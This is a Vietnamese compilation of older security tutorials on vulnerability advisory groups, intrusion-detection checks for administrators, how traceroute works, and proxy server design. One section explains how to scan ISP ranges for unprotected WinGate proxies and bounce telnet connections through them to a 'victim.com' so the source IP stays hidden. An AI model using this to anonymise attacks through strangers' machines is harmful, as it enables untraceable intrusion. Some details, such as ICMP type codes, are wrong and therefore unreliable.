Tuy nhiên, có phải bất kỳ lỗ hổng bảo mật nào cùng nguy hiểm đến hệ thống hay không? Có rất nhiều thông báo liên quan đến lỗ hổng bảo mật trên mạng Internet, hầu hết trong số đó là các lỗ hổng loại C, và không đặc biệt nguy hiểm đối với hệ thống. Ví dụ, khi những lỗ hổng về sendmail được thông báo trên mạng, không phải ngay lập tức ảnh hưởng trên toàn bộ hệ thống. Khi những thông báo về lỗ hổng được khẳng định chắc chắn, các nhóm tin sẽ đưa ra một số phương pháp để khắc phục hệ thống.

Trên mạng Internet có một số nhóm tin thường thảo luận về các chủ đề liên quan đến các lỗ hổng bảo mật đó là:

- CERT (Computer Emergency Reponse Team): Nhóm tin này hình thành sau khi có phương thức tấn công Worm xuất hiện trên mạng Internet. Nhóm tin này thường thông báo và đưa ra các trợ giúp liên quan đến các lỗ hổng bảo mật. Ngoài ra nhóm tin còn có những báo cáo thường niên để khuyến nghị người quản trị mạng về các vấn đề liên quan đến bảo mật hệ thống. Địa chỉ Web site của nhóm tin: http://www.cert.org

- CIAC (Department of Energy Computer Incident Advisory Capability): tổ chức này xây dựng một cơ sở dữ liệu liên quan đến bảo mật cho bộ năng lượng của Mỹ. Thông tin của CIAC được đánh giá là một kho dữ liệu đầy đủ nhất về các vấn đề liên quan đến bảo mật hệ thống. Địa chỉ web site của CIAC : http://ciac.llnl.org

- FIRST (The Forum of Incident Response and Security Teams): Đây là một diễn đàn liên kết nhiều tổ chức xã hội và tư nhân, làm việc tình nguyện để giải quyết các vấn đề về an ninh của mạng Internet.

Địa chỉ Web site của FIRST: http://www.first.org. Một số thành viên của FIRST gồm:

- CIAC

- NASA Automated Systems Incident Response Capability.

- Purdue University Computer Emergency Response Team

- Stanford University Security Team

- IBM Emergency Response Team

CÁC BIỆN PHÁP PHÁT HIỆN HỆ THỐNG BỊ TẤN CÔNG:

Không có một hệ thống nào có thể đảm bảo an toàn tuyệt đối; bản thân mỗi dịch vụ đều có những lỗ hổng bảo mật tiềm tàng. Đứng trên góc độ người quản trị hệ thống, ngoài việc tìm hiểu phát hiện những lỗ hổng bảo mật còn luôn phải thực hiện các biện pháp kiểm tra hệ thống xem có dấu hiệu tấn công hay không. Các biện pháp đó là:

- Kiểm tra các dấu hiệu hệ thống bị tấn công: hệ thống thường bị treo hoặc bị crash bằng những thông báo lỗi không rõ ràng. Khó xác định nguyên nhân do thiếu thông tin liên quan. Trước tiên, xác định các nguyên nhân về phần cứng hay không, nếu không phải phần cứng hãy nghĩ đến khả năng máy bị tấn công

- Kiểm tra các tài khoản người dùng mới trên hệ thống: một số tài khoản lạ, nhất là uid của tài khoản đó = 0

- Kiểm tra xuất hiện các tập tin lạ. Thường phát hiện thông qua cách đặt tên các tệp tin, mỗi người quản trị hệ thống nên có thói quen đặt tên tập tin theo một mẫu nhất định để dễ dàng phát hiện tập tin lạ. Dùng các lệnh ls -l để kiểm tra thuộc tính setuid và setgid đối với những tập tinh đáng chú ý (đặc biệt là các tập tin scripts).

- Kiểm tra thời gian thay đổi trên hệ thống, đặc biệt là các chương trình login, sh hoặc các scripts khởi động trong /etc/init.d, /etc/rc.d ...

- Kiểm tra hiệu năng của hệ thống. Sử dụng các tiện ích theo dõi tài nguyên và các tiến trình đang hoạt động trên hệ thống như ps hoặc top ...

- Kiểm tra hoạt động của các dịch vụ mà hệ thống cung cấp. Chúng ta đã biết rằng một trong các mục đích tấn công là làm cho tê liệt hệ thống (Hình thức tấn công DoS). Sử dụng các lệnh như ps, pstat, các tiện ích về mạng để phát hiện nguyên nhân trên hệ thống.

- Kiểm tra truy nhập hệ thống bằng các account thông thường, đề phòng trường hợp các account này bị truy nhập trái phép và thay đổi quyền hạn mà người sử dụng hợp pháp không kiểm sóat được.

- Kiểm tra các file liên quan đến cấu hình mạng và dịch vụ như /etc/inetd.conf; bỏ các dịch vụ không cần thiết; đối với những dịch vụ không cần thiết chạy dưới quyền root thì không chạy bằng các quyền yếu hơn.

- Kiểm tra các phiên bản của sendmail, /bin/mail, ftp; tham gia các nhóm tin về bảo mật để có thông tin về lỗ hổng của dịch vụ sử dụng

Các biện pháp này kết hợp với nhau tạo nên một chính sách về bảo mật đối với hệ thống.

Tìm hiểu về "Traceroute"

Traceroute là gì?

Traceroute là một chương trình cho phép bạn xác định được đường đi của các gói packets từ máy bạn đến hệ thống đích trên mạng Internet.

Một ví dụ về Traceroute!

Traceroute có thể làm được gì? Bạn hãy xem ví dụ sau sẽ rõ!

C:\windows>tracert 203.94.12.54

Tracing route to 203.94.12.54 over a maximum of 30 hops

1 abc.netzero.com (232.61.41.251) 2 ms 1 ms 1 ms

2 xyz.Netzero.com (232.61.41.0) 5 ms 5 ms 5 ms

3 232.61.41.10 (232.61.41.251) 9 ms 11 ms 13 ms

4 we21.spectranet.com (196.01.83.12) 535 ms 549 ms 513 ms

5 isp.net.ny (196.23.0.0) 562 ms 596 ms 600 ms

6 196.23.0.25 (196.23.0.25) 1195 ms1204 ms

7 backbone.isp.ny (198.87.12.11) 1208 ms1216 ms1233 ms

8 asianet.com (202.12.32.10) 1210 ms1239 ms1211 ms

9 south.asinet.com (202.10.10.10) 1069 ms1087 ms1122 ms

10 backbone.vsnl.net.in (203.98.46.01) 1064 ms1109 ms1061 ms

11 newdelhi-01.backbone.vsnl.net.in (203.102.46.01) 1185 ms1146 ms1203 ms

12 newdelhi-00.backbone.vsnl.net.in (203.102.46.02) ms1159 ms1073 ms

13 mtnl.net.in (203.194.56.00) 1052 ms 642 ms 658 ms

Tôi cần biết đường đi từ máy tôi đến một host trên mạng Internet có địa chỉ ip là 203.94.12.54. Tôi cần phải tracert đến nó! Như bạn thấy ở trên, các gói packets từ máy tôi muốn đến được 203.94.12.54 phải đi qua 13 hops(mắt xích) trên mạng. Đây là đưòng đi của các gói packets:

Netzero(ISP đã gởi dữ liệu đi) -> Spectranet (một nhà công cấp mạng xương sống - Backbone Provider) -> New York ISP -> New York Backbone -> Asia -> South Asia -> India Backbone -> New Delhi Backbone -> một router khác trong New Delhi Backbone -> New Delhi ISP

Như vậy, host có địa chỉ ip 203.94.12.54 nằm ở New Delhi, India, South Asia! Bạn cũng có thể telnet đến 203.94.12.54 trên cổng 13(datetime) để xác định giờ GMT qua đó bạn có thể biết được vị trí của host này(yêu cầu là host 203.94.12.54 phải chạy daemon datetime và được định cấu hình đúng về thời gian)!

Traceroute hoạt động như thế nào?

Trước hết, bạn cần biết về ICMP, TTL và cách làm việc của các routers(bộ định tuyến)!

Những kiến thức cơ bản

ICMP - Internet Control Message Protocol. ICMP được dùng để thông báo các lỗi xảy ra trong quá trình truyền đi của các gói dữ liệu trên mạng. ICMP thuộc tầng vận huyển - Transpoort Layer!

Tầng ứng dụng

HTTP FTP Telnet Finger SSH DNS

POP3/IMAP SMTP Gopher BGP

Time/NTP Whois TACACS+ SSL

DNS SNMP RIP

RADIUS Archie

Traceroute tftp

Ping

Tầng vận chuyển

TCP

UDP

ICMP

OSPF

Tầng Internet

IP

ARP

Tầng vật lí

Ethernet/802.3 Token Ring (802.5) SNAP/802.2 X.25 FDDI ISDN

Frame Relay SMDS ATM Wireless (WAP, CDPD, 802.11)

Fibre Channel DDS/DS0/T-carrier/E-carrier SONET/SDH DWDM

PPP HDLC SLIP/CSLIP xDSL Cable Modem (DOCSIS)

Tất cả các ICMP messages đều được chuyển đi cùng với các IP datagrams. Mỗi ICMP message được gói trong IP datagram sẽ có dạng như sau:

+---------------------+-------------------------+

| IP Header(20 bytes) | ICMP message (32 bytes) |

+---------------------+-------------------------+

Sau đây là cấu trúc của một IMCP message: (tham khảo RFC792 để biết thêm!)

0 7 8 15 16 31

+-----------------+-----------------+-----------------+

| Type (0 or 8) | Code (0) |16-bit Checksum |

+-----------------+-----------------+-----------------+

| Indentifier | sequence number |

+-----------------+-----------------+-----------------+

| Optional Data (nội dung tùy thuộc vào Type và Code) |

+-----------------------------------------------------+

trường type có 15 giá trị khác nhau, tùy thuộc vào từng loại ICMP error message cụ thể. Ví dụ type=3 để chỉ định cho thông báo lỗi "Không đến được đích" - "Destination unreachable" error message!

trường code = sub-error dùng để xác định chính xác lỗi đã xảy ra. Ví dụ, type=3 và code=0 nghĩa là "Network Unreachable"(không đến được mạng); nếu type=3, code=1 nghĩa là "Host Unreachable"(không đến được host)...

TTL - Time to Live. TTL là một trường 8 bit trong IP header(bạn hãy xem lại cấu trúc của IP header!). TTL là thời gian gói dữ liệu tồn tại trên mạng trước khi nó bị bỏ qua. Người gởi dữ liệu đi sẽ xác định một giá trị TTL trước, thường là từ 32 -> 64. Giá trị này sẽ được giảm đi một khi một khi được chuyển qua một bộ định tuyến trên mạng. Khi giá trị này bằng 0, datagram này sẽ bị bỏ qua và giao thức ICMP sẽ báo lỗi về cho người gởi. Điều này sẽ tránh cho datagram này đi vào một vòng lặp vô tận qua các bộ định tuyến.

Mỗi bộ định tuyến khi nhận được IP datagram sẽ giảm giá trị TTL của datagram này đi một. Hầu hết các bộ định tuyến đều không giữ lại datagram này trong thời gian quá 1 giây trước khi chuyển datagram này đi. Nên giá trị TTL có thể coi bằng hop(counter) = số bộ định tuyến mà datagram này vừa vượt qua.

Khi bộ định tuyến nhận được một datagram có trường TTL bằng 0 hoặc 1, nó sẽ không chuyển datagram này đi tiếp. Thay vào đó, nó sẽ bỏ qua datagram này và gởi một ICMP message "Time Exceeded"(quá thời gian) trở lại cho người đã gởi datagram này! Vì ICMP message mà bộ định tuyến gởi trở lại cho người gởi có địa chỉ nguồn - source address là địa chỉ ip của bộ định tuyến này nên người gởi có thể biết được địa chỉ ip của router này!

Cách làm việc của traceroute!

Traceroute gởi một IP datagram có TTL=1 đến hệ thống đích. Router đầu tiên nhận được datagram này sẽ giảm giá trị TTL đi một -> TTL=0 và router này sẽ bỏ qua datagram này(không gởi nó đi tiếp!) và gởi một ICMP error message với địa chỉ ip nguồn là địa chỉ của nó đến máy bạn. Như vậy router có thể xác định địa chỉ ip của router thứ nhất! Sau đó, traceroute sẽ gởi một datagram mới đi với giá trị TTL=2(1+1=2) đến hệ thống đích. Router đầu tiên sẽ giảm giá trị của TTL đi một -> TTL=1(2-1=1) và chuyển datagram này sang router thứ 2. Router thứ 2 nhận được datagram có TTL=1 sẽ giảm TTL=0. Rounter 2 nhận thấy TTL=0 nên nó sẽ không chuyển datagram này đi tiếp. Router 2 sẽ gởi trở lại máy bạn một ICMP error message với địa chỉ ip nguồn là địa chỉ ip của nó(router 2). Như vậy trình traceroute trên máy bạn sẽ biết được router thứ 2 mà datagram đã đi qua. Traceroute sẽ tiếp tục gởi một datagram khác có TTL=3(2+1=3) đi và lặp lại quá trình trên cho đến khi datagram đến được hệ thống đích!

Nếu bây giờ IP datagram đã đến được đích, TTL=1. Host đích sẽ bỏ qua datagram này và nó cũng sẽ không gởi "Time Exceeded" ICMP error message. Như vậy thì bạn sẽ không thể nào biết được là mình đã đến đích chưa?! Traceroute dùng một cơ chế khác như sau:

Traceroute gởi UDP datagrams đến host đích trên các cổng UDP có số hiệu lớn(>30000). Sở dĩ nó chọn các cổng có giá trị lớn vì thường không có ứng dụng nào đang lắng nghe ở các cổng này. Khi host đích nhận được UDP datagram này, nó sẽ gởi trả lại một ICMP error message "Port Unreachable"(không đến được cổng) cho traceroute. Bây giờ thì traceroute có thể phân biệt được sự khác nhau giữa ICMP error message "Time Exceeded" với "Port Unreachable" để biết được đã đến được đích hay chưa?!

Ghi chú: ICMP error message "Time Exceeded" có type=1 và code=0; ICMP eror message "Port Unreachable" có type=3 và code=3

Tổng kết:

traceroute gởi UDP datagrams đến host đích với giá trị TTL=1 và được tăng sau mỗi lần để xác định các routers mà datagrams đã đi qua. Mỗi router sẽ gởi trở về một ICMP message "Time Exceeded". Riêng hệ thống đích sẽ gởi trở lại cho traceroute một ICMP message "Port Unreachable". Traceroute dựa vào sự khác biệt này để xác định xem đã đến được đích chưa?!

Ví dụ cuối cùng!

host2 # traceroute xyz.com

traceroute to xyz.com (202.xx.12.34), 30 hops max, 40 byte packets

1 isp.net (202.xy.34.12) 20ms 10ms 10ms

2 xyz.com (202.xx.12.34) 130ms 130ms 130ms

Dòng đầu tiên cho biết hostname và địa chỉ IP của hệ thống đích. Dòng này còn cho chúng ta biết thêm giá trị TTL<=30 và kích thước của datagram là 40 bytes(20-bytes IP Header + 8-bytes UDP Header + 12-bytes user data).

Dòng thứ 2 cho biết router đầu tiên nhận được datagram là 202.xy.34.12, giá trị của TTL khi gởi đến router này là 1. Router này sẽ gởi trở lại cho chương trình traceroute một ICMP message error "Time Exceeded". Traceroute sẽ gởi tiếp một datagram đến hệ thống đích.

Dòng thứ 3, xyz.com(202.xx.12.34) nhận được datagram có TTL=1(router thứ nhất đã giảm một trước đó - TTL=2-1=1). Tuy nhiên, xyz.com không phải là một router, nó sẽ gởi trở lại cho traceroute một ICMP error message "Port Unreachable". Khi nhận được ICMP message này, traceroute sẽ biết được đã đến được hệ thống đích xyz.com và kết thúc nhiệm vụ tại đây.

Trong trường hợp router không trả lời sau 5 giây, traceroute sẽ in ra một dấu sao "*"(không biết) và tiếp tục gởi datagram khác đến host đích!

Hy vọng đến đây bạn có hiểu được traceroute làm việc như thế nào!? Chúc bạn vui vẻ !

Tìm hiểu về wingate :

1. WinGate là gì?

WinGate là một chương trình đơn giản cho phép bạn chia các kết nối ra. Thí dụ: bạn có thể chia sẻ 1 modem với 2 máy.

WinGate dùng với nhiều proxy khách nhau có thể che giấu bạn.

2. Mặc định sau khi cài đặt

Khi bạn cài WinGate bình thường, không thay đổi thông số gì thì sẽ có một số mặc định:

Quote

Port | Service

23 Telnet Proxy Server - This is default and running right after install.

1080 SOCKS Server - This once setup via GateKeeper has no password until you set one.

6667 IRC Mapping - This once setup via GateKeeper has no password until you set one.

3. Port 23: Telnet Proxy

Proxy sẽ chạy ngay sau khi bạn hoàn thành cài đặt và làm mọi thứ trở nên tồi tệ nếu không có mật mã sau khi cài đặt và không đòi hỏi bạn là người duy nhất. Nhiều quản trị hệ thống không biết việc này và cũng không nghĩ sẽ đặt mật mã cho nó và đây là nơi xuất hiện trục trặc.

Telnet proxy cũng thật sự đơn giản. Bạn telnet trên cổng 23 trên máy chủ chạy WinGate telnet proxy và bạn sẽ có dấu nhắc WinGate> Tại dấu nhắc này bạn đánh vào server, một khoảng trống và cổng bạn muốn kết nối vào.

Thí dụ:

Quote

telnet wingate.net

Connected to wingate.net

WinGate> victim.com 23

Thí dụ này cho thấy một ai đang dùng telnet vào WinGate server và sau đó từ WinGate server đó telnet tới victim.com vì vậy trên log của victim.com sẽ hiện ra IP của wingate (wingate.net) và vì vậy có thể giữ IP của mình bí mật.

4. Port 1080: SOCKS Proxy

Socks proxy không được cài đặt mặc định nhưng ngay sau khi dùng GateKeeper sẽ cài đặt nó. Việc cài đặt này không cần password, trừ khi bạn có đặt. Nếu bạn quen với socks bạn có thể biết nhiều việc có thể làm với nó.

5. Port 6667: IRC Proxy

IRC proxy cũng giống như khi chúng ta dùng wingate telnet proxy bounce tới irc server trừ khi irc proxy đã được thiết lập để đến một server. Nó không được thiết lập để chạy sau khi cài đặt nhưng sau khi bạn cài sẽ không cần password, trừ khi bạn có đặt.

6. Làm thế nào để tìm và sử dụng WinGate?

Tìm WinGates cũng rất dễ làm. Nếu bạn muốn tìm IP WinGates tĩnh (IP không đổi) thì đến yahoo hay một trang tìm kiếm cable modem. Tìm kiếm cable modems vì nhiều người dùng cable modems có WinGate để họ có thể chia sẻ đường truyền rộng của nó cable modems cho những máy khác trong nhà. Một công ty cable modem lớn là Cox Cable. Trang web của họ có thể tìm thấy ở <a target='_blank'>www.home.com</a>. The Cox Cable có IP trong khoảng 24.1.X.X.

Bạn có thể dùng Port hay Domain scanners và scan Port 1080, tên gọi là SOCKS Proxy, đây cũng là một cách đơn giản để tìm WinGate.

Thí dụ:

24.1.67.1 chỉ đến c224084-a.frmt1.sfba.home.com mà tại đó chúng ta biết sfba = San Fransico Bay Area hay cái gì gần như vậy.

Đó là cách tìm IP WinGates tĩnh. Để tìm IP động (IP thay đổi mỗi lần user kết nối vào internet) của WinGates cũng không khó chút nàol. Hầu hết tất cả ISP lớn và nhỏ đều có user dùng WinGate. Bạn cần phải biết định dạng của ISP's dynamic ppp addresses hoặc bạn có thể dùng IRC (Internet Relay Chat). Giả sử bạn có ppp IP của armory-us832.javanet.com. Bây giờ bạn dns IP đó và có 209.94.151.143. Bây giờ lấy IP đó và đưa nó vào domain scanner program.

Thí dụ:

Domscan có thể tìm thấy tại Rhino9 web site (<a target='_blank'>rhino9.abyss.com</a>). Ok, bây giờ bạn đã có domscan. Chạy domscan và có một box để đặt IP và port để scan. WinGate telnet proxy theo mặc định chạy trên cổng 23. Vì vật đặt 209.94.151.143 vào trong box đầu tiên trong domscan và 23 trong box thứ 2, sau đó click vào start. Ta có được kết quả:

209.94.151.2

209.94.151.4

209.94.151.6

209.94.151.10

209.94.151.8

209.94.151.73

209.94.151.118

209.94.151.132

Bây giờ kiểm tra từng cái để tìm WinGate prompt. Để làm vật ta telnet tới 209.94.151.2 trên cổng 23 và nếu nó hiện WinGate> khi chúng ta kết nối thì nó là WinGate. Nếu không chúng ta làm tiếp địa chỉ kế tiếp có thể là 209.94.151.4. Chúng ta làm như vậy cho đến hết danh sách IP.

Ghi chú:

Nếu chúng ta scan dynamic IP WinGates nếu số cuối cùng của IP càng lớn thì hy vọng nó là IP của WinGate càng lớn. Thí dụ: Cơ hội 209.94.151.132 là WinGate lớn hơn 209.94.151.2.

Vài nét về Proxy

:

GIỚI THIỆU CHUNG

Proxy cung cấp cho người sử dụng truy xuất internet với những host đơn. Những proxy server phục vụ những nghi thức đặt biệt hoặc một tập những nghi thức thực thi trên dual_homed host hoặc basion host. Những chương trình client của người sử dung sẽ qua trung gian proxy server thay thế cho server thật sự mà người sử dụng cần giao tiếp.

Proxy server xác định những yêu cầu từ client và quyết định đáp ứng hay không đáp ứng, nếu yêu cầu được đáp ứng, proxy server sẽ kết nối với server thật thay cho client và tiếp tục chuyển tiếp đến những yêu cầu từ clientđến server, cũng như đáp ứng những yêu cầu của server đến client. Vì vậy proxy server giống cầu nối trung gian giữa server và client

TẠI SAO TA PHẢI CẦN PROXY

Để đáp ứng những nhu cầu của người sử dụng khi cần truy xuất đến những ứng dụng cung cấp bởi internet nhưng vẫn đảm bảo được an toàn cho hệ thống cục bộ. Trong hầu hết những phương pháp được đaư ra để giải quyết điều này là cung cấp một host đơn để truy xuất đến internet cho tất cả những người sử dụng. Tuy nhiên, phương pháp này không phải là phương pháp giải quyết thỏa mản nhất bởi vì nó tạo cho người sử dung cảm thấy không thoải mái. Khi truy xuất đến internet thì họ không thể thực hiện những công việc đó một cách trực tiếp, phải login vào hual_homed host, thực hiện tất cả những công việc ở đây, và sau đó bằng cách nào đó chuyển đổi kết quả đạt được của công việc trở lại workstation sử hửu

Điều này trở nên rấ tồi tệ ở những hệ thống với nhiền hệ điều hành khác nhau, vd: nếu hệ thống là bastion_host nhưng riêng dual_host là unix.

Khi dual_home host được thiết kế trên mô hình không có proxy, điều đó sẽ khiến cho người sử dụng thêm bực bồiva đáng chú ý hơn là giảm đi những tiện ích mà intenet cung cấp, tồi tệ hơn là chúng thường không cung cấp một cách không an toàn và đầy đủ,khi một máy gồm nhiều người sử dụng tất nhiên độ an toàn của nó sẽ giảm, đặt biệt khi cố gắn bắt với vạn vật bên ngoài.

Proxy server gíup người sử dụng thoải mái hơn và an toàn cho dual homed host, thay thế yêu cầu của người sử dụng bằng cách gián tiến thông qua dual homed host. Hệ thống proxy cho phép tất cả những tương tác nằng dưới một hình thức nào đó. User có cảm giác làm việc trực tiếp với server trên internetmà họ thật sự muốn truy xuất

Proxy applycation chính là chương trình trên applycation level getaway firewall hành động trên hình thức chuyển đổi những yêu cầu người sử dụng thông qua firewall, tiến trình này được thực hiện trình tự như sau:

_ thành lập một kết nối applycation trên firewall.

_ proxy applycation thu nhận thông tin về việc kết nối và yêu cùa của user

_ sử dụng thông tin để xác nhận yêu cuầ đó được xác nhận không, nếu chấp nhận proxy sẽ tạo sự kết nối khác từ firewall đến máy đích

_ sau đó thực hiện sự giao tiếp trung gian, truyền dữ liệu qua lại giữa client và server

proxy system giải quyết được những rủi ro trên hệ thống bởi tránh user login vào hệ thống và ép buộc thông qua phần mềm điều khiển.

SỰ CẦN THIẾT CỦA PROXY

Proxy cho user truy xuất dịch vụ trên internet theo nghĩa trực tiếp. Với dual host homed cần phải login vào host trước khi sử dụng dịch vụ nào trên internet. Điều này thường không tiện lợi, và một số người trể nên thất vọng khi họ có cảm giác thông qua firewall, với proxy nó giải quyết được vấn đề này. Tất nhiên nó còn có những giao thức mới nhưng nói chung nó cũng khá tiện lợi cho user. Bởi vì proxy cho phép user truy xuất những dịch vụ trên internet từ hệ thống cá nhân của họ, vì vậy nó không cho phép packet đi trực tiếp giữa hệ thống sử dụng và internet. đường đi là giáng tiếp thông qua dual homed host hoặc thông qua sự kết hợp giữa bastion host và screening rounter.

Thực tế proxy hiểu được những nghi thức dưới, nên logging được thực hiện theo hướng hiệu quả đặc biệt, vd: thay vì logging tất cả thông tin thông qua đường truyền, một proxy FPT server chỉ log những lệnh phát ra và server đáp ứng mà nhận được. Kết quả này đơn giản và hửu dụng hơn rất nhiều.

NHỮNG KHUYẾT ĐIỂM CỦA PROXY

Mặc dù phần mềm prory có hiệu quả rộng rải những dịch vụ lâu đời và đơn giàn như FPT và Telnet, những phần mềm mới và ít được sử dụng rộng raãi thì hiếm khi thấy. Thường đó chính là sự chậm trể giữa thời gian xuất xuất hiện một dịch vụ mới và proxy cho dịch vụ đó, khoảng thời gian phụ thuộc vào phương pháp thiết kế proxy cho dịch vụ đó, điều này cho thấy khá khó khăn khi đưa dịch vụ mới vào hệ thống khi chưa có proxy cho nó thì nên đặt bên ngoài fire wall, bởi vì nếu đặt bên trong hệ thống thì đó chính là yếu điểm.

Đôi khi cần một proxy khác nhau cho mỗi nghi thức, bởi vì proxy server phải hiểu nghi thức đó để xác định những gì được phép và không được phép. Để thực hiện nhiệm vụ như là client đến server thật và server thật đến proxy client, sự kết hợp , install và config tất cả những server khác nhau đó có thể rất khó khăn

Những dịch vụ proxy thường sửa đổi chương trình client, procedure hoặc cả hai. Ngoại trừ một số dịch vụ được thiết kế cho proxying , proxy server yêu cầu sửa đổi với client hăọc procedure, mỗi sự sửa đổi có những bất tiện riêng của nó, không thể luôn luôn sử dụng công cụ có sẵn với những cấu trúc hiện tại của nó

Proxying dựa vào khà năng chèn vào proxy server giữa server thật và client mà yêu cầu tác động tương đối thẳn thắn cả hai.

Những dịch vụ proxy không bảo vệ cho hệ thống ứng với những nghi thức kém chất lượng. Như một giải pháp an toàn, proxying dựa vào những khả năng xác định những tác vụ trong nghi thức an toàn. Không phải tất cả các dịch vụ đều cung cấp theo khuynh hướng an toàn này, như nghi thức Xwindows cung cấp khá nhiều những tác vụ không an toàn.

PROXYING ĐÃ THỰC HIỆN NHƯ THẾ NÀO

Những chi tiếc trong việc proxying thực hiện như thế nào khác nhau từ dịch vụ này đến dịch vụ khác, khi setup proxying, có một vài dịch vụ thưc hiện dể dàng hoặc tự động, nhưng vài dịch vụ có sự chuyển đổi rất khó khăn. Tuy nhiện, trong hầu hết những dịch vụ ngoài yêu cầu những phần mềm proxy server tương ứng, trên client cũng cần phải có những yêu cầu như sau:

Custum client software: phần mềm loại này phải biết như thế nào để liên kết với proxy server thay server thật khi user yêu cầu và yêu cầu proxy server những gì server thật kết nối đến. Những phần mềm custom client thường chỉ có hiệu quả chỉ một vài platform

Vd:

packet getaway từ Sun là một proxy packet cho FTP và Telnet, nhưng nó chỉ được sử dụng trên hệ thống SUN bởi vì nó cung cấp recompiled Sun binaries

Mặc dù nếu phần mềm hiệu quả cho platform tương ứ ng, nó cũng có thể không phải điều mà user mong muốn, vd: macintosch có hàng chục chương trình PTF client, một trong vài số đó có những giao diện khá ấn tượng với user, những phần khác có những đặc điểm hửu dụng khác. Anarchie là chương trình mà nó kết hợp một archie client và FPT client bên trong chương trình đơn, vì vậy user có thể tìm file với archie và dùng FPT để lất nó, tất cả với giao diện người sử dụng thích hợp, điều này sẽ không may mắn cho chúng ta nếu muốn hổ trợ proxy server.

Sử dụng những chuyển đổi client cho proxying không dễ dàng thuyết phục user. Trong hầu hết những hệ thống sử dụng client không chuyển đổi những kết nối bên trong và một số chuyển đổi chỉ với những kết nối bên ngoài.

Custom user procedure: user dùng phần mềm client chuẩn để giao tiếp với proxy server và nó kết nối với server thật, thay thế trực tiếp server thật.

Proxy server được thiết kế thực thi với phần mềm client chuẩn. Tuy nhiên, chúng yêu cuầ user theo những custom procedure. User trước tiên kết nối với proxy server và sau đó cung cấp proxy server tên host mà nó muốn kết nối đến. Bởi vì một vài nghi thức được thiết để chuyển những thông tinnày, user không phải nhớ tên proxy server nhưng củng phải nhớ tên host mà nó muốn giao tiếp.

Như thế nào để thực hiện công việc này, cần phải nắm được những thủ tục đặc trưng theo sau mỗi nghi thức.

Vd:

với FTP, có thể user muốnn nhận một file từ anonymous FTP server, user cần thực hiện những bước sau:

1. sử dụng bất kỳ FTP client , user kết nối đến proxy server thay thế trực tiếp đến anonumous FTP server.

2. Tại dấu nhắc user name, trong việc thêm vào tên chỉ định muốn sử dụng, user phải chỉ định tên server thật muốn kết nối

CÁC DẠNG PROXY SYSTEM

Dạng kết nối trực tiếp

Phương pháp đầu tiên được sử dụngtrong kỹ thuật proxy là cho user kết nối trực tiếp đến firewall proxy, sau đó proxy hỏi user cgo địa chỉ host hướng đến, đó là một phương pháp brute force sử dụng bởi firewall một cách dể dàng, và đó cũng là nguyên nhân tại sao nó là phương pháp ít thích hợp.

Trước tiên, yêu cầu user phải biết địa chỉ của firewall, kế tiếp nó yêu cầu user nhập vào hai địa chỉ hai địa chỉ cho mỗi kết nối: địa chỉ của filewall và địa chỉ đích hướng đến. Cuối cùng nó ngăn cản những ứng dụng hoặc những nguyên bản trên máy tính của user điều đó tạo sự kết nối cho user, bởi vì chúng không biết như thế nào điều khiển những yêu cầu đặc biệt cho sự truyền thông với proxy

DẠNG THAY ĐỔI CLIENT

Phương pháp kế tiếp sử dụng proxy setup phải thêm vào những ứng dụng tại máy tính của user. User thưc thi những ứng dụng đặc biệt đó với việc tạo ra sự kết nối thông qua firewall. User với ứng dụng đó hành động chỉ như những ứng dụng không sửa đổi. User cho địa chỉ của host hướng tới. Những ứng dụng thêm vào biết địa chỉ firewall từ file config cuc bộ, setup sự kết nối đến ứng dụng proxy trên firewall, và truyền cho nó địa chỉ cung cấp bởi người sử dụng. Phương pháp này rất khó hiệu quả và có khả năng che dấu người sử dụng, tuy nhiên, cần có một ứng dụng client thêm vào cho mỗi dịch vụ mạng là một đặt tính trở ngại.

PROXY VÔ HÌNH

Một phương pháp phát trỉnh gần đây cho phép truy xuất đến proxy, trong vài hệ thống firewall được biết như proxy vô hình. Trong mô hình này, không cần có những ứng dụng thêm vào với user và không kết nối trực tiếp đến firewall hoặc biết rằng firewall có tồn tại. Sử dụng sự điều khiển đường đi cơ bản, tất cả sự kết nối đến mạng bên ngoài được chỉ đường thông qua firewall. Như những packet nhập vào firewall, tự động chúng được đổi hướng đến proxy đang chờ. Theo hướng này,firewall thực hiện rất tốt việc giả như host đích. Khi kết nối tạo ra firewall proxy , client applycation nghỉ rằng nó được kết nối đến server thật, nếu được phép, proxy applycation sau đó thực hiện hàm proxy chuẩn trong việc tạo kết nối thứ hai đến server thật

Proxy lớp ứng dụng thì đối nghị với proxy lớp circuuit: application_level proxy được thực thi ở lớp ứng dụng. Nó cung cấp cho từng dịch vụ riêng và interpret những dòng lệnh trong nghi thức đó. Một circuit_level proxy tạo nên một circuit giữa server và client không cần phải interpret những nghi thức này. Nói chung, application_level proxy sử dung modified client. Để tạo ra kết nối proxy, phải biết vị trí nào muốn kết nối đến. Một hybrid gateway đơn giản có thể chặn đứng kết nối, nhưng một proxy host chỉ có thể nhận kết nồima đề nghị với nó, và phải chỉ ra vị trí muốn kết nối. Một application_level proxy có thể nhận thông tin trong từng nghi thức riêng. Một circuit_level proxy không thể interpret theo từng nghi thức và cần phải có thông tin hổ trợ cho nó thông qua một cách nào khác. ưu điểm của circuit_level proxy server là ở đó nó cung cấp cho hầu hết các nghi thức khác nhau , hầu như circuit_level proxy cũng là proxy server chung cho tất cả các dạng nghi thức, tuy nhiên không phải tất cả các nghi thức đều dễ dàng được điều khiển bởi circuit_level proxy , khuyết điểm của circuit_level proxy là nó điều khiển những gì xảy ra thông qua proxy này như là packet filter, nó điều khiển những kết nối cơ bản dựa vào địa chỉ nguồn và địa chỉ đích và không thể xác định những lệnh đi qua nó là an toàn hoặc những sự kiện mà nghi thức đó mong muốn, circuit_level proxy dể dàng bị đánh lừa bởi những server setup lại những cổng gán đến những server khác.

Proxy chung thì đối nghịch với những proxy chuyên biệt: mặc dù “application_level” và “circuit_level” thường được dùng, nhưng đôi khi cũng phân biệt giữa “dedicated” và “generic” proxy server là server chỉ phục vụ một nghi thức đơn , generic proxy server là server phục vụ cho nhiền nghi thức. Thật ra, dedicated proxy server là application_level, và generic proxy server là circuit_level.

Intelligent proxy server: một proxy server có thể làm nhiều điều chứkhông phải chỉ chuyễn tiếp những yêu cầu, đó chính là một intelligent proxy server, vd: cern http proxy server caches data, vì vậy nhiều yêu cầu data không ra khỏi hệ thống khi chưa có sự xử lý ccủa proxy server. Proxy server (đặt biệt là application level server) có thể cung cấp login dễ dàng và điều khiển truy xuất tốt hơn, còn circuit proxy thường bị giới hạn bởi những khả năng này

